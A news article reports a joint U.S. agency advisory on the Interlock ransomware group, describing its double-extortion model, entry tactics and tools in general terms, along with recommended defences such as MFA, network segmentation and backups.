TL/DR –
Four major U.S. agencies have issued a joint cybersecurity alert about the rising threat from the Interlock ransomware operation, which has targeted businesses, healthcare providers, and critical infrastructure across North America and Europe. Emerging in September 2024, the group uses a double-extortion model, encrypting systems, stealing data, and threatening to publish stolen files if ransom is not paid. To protect against Interlock attacks, organizations are urged to implement DNS filtering, use web application firewalls, keep systems updated, enforce multifactor authentication, segment networks, train employees in threat identification, and maintain secure backups of critical data.
US Agencies Warn of Escalating Interlock Ransomware Threats
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have jointly issued a cybersecurity alert. This urgent warning emphasizes the escalating threat posed by the Interlock ransomware operation, primarily targeting businesses, healthcare providers, and critical infrastructure across North America and Europe.
Interlock, which emerged in September 2024, carries out financially motivated ransomware campaigns using a double-extortion model. This involves encrypting the victim’s system, stealing data, and threatening to publish these files if a ransom is not paid.
Ransom demands are not immediately presented. Victims receive a unique code and are directed to a .onion URL on the Tor network for ransom negotiations. The Interlock actors, although opportunistic, frequently target healthcare organizations. High-profile victims include Kettering Health and Fortune 500 company DaVita.
Interlock’s Uncommon Entry Tactics
Interlock employs unique initial tactics like drive-by downloads from compromised websites, disguising malicious payloads as fake updates. Social engineering methods, including “ClickFix” and “FileFix”, trick users into executing malicious code under the guise of system error fixes.
After gaining access, Interlock utilizes tools like Interlock RAT and NodeSnake RAT to control systems, communicate with command-and-control servers, and launch further attacks. PowerShell scripts are used to download credential-stealing malware, which captures usernames, passwords, and keystrokes for lateral movement and privilege escalation.
The ransomware group also exploits legitimate tools like Azure Storage Explorer and AzCopy to extract data from cloud environments. An uncommon ELF encryptor based FreeBSD has been seen on Linux systems, diverging from typical VMware ESXi-focused ransomware payloads.
Protecting Against Potential Interlock Attacks
To mitigate the risk of an Interlock ransomware attack, the federal advisory recommends several defense measures. These include implementing DNS filtering, using web application firewalls, keeping system and software updates current, enforcing multifactor authentication, segmenting networks, training employees, and maintaining secure backups.
For more mitigation strategies and free cybersecurity resources, organizations are advised to visit stopransomware.gov. If you suspect or have experienced ransomware or malicious activity, contact your local FBI office or report to CISA via the agency’s Incident Reporting System.
For more insights, delve into our detailed report on Dell’s data breach and World_Leaks’ claims.
—
Read More Health & Wellness News ; US News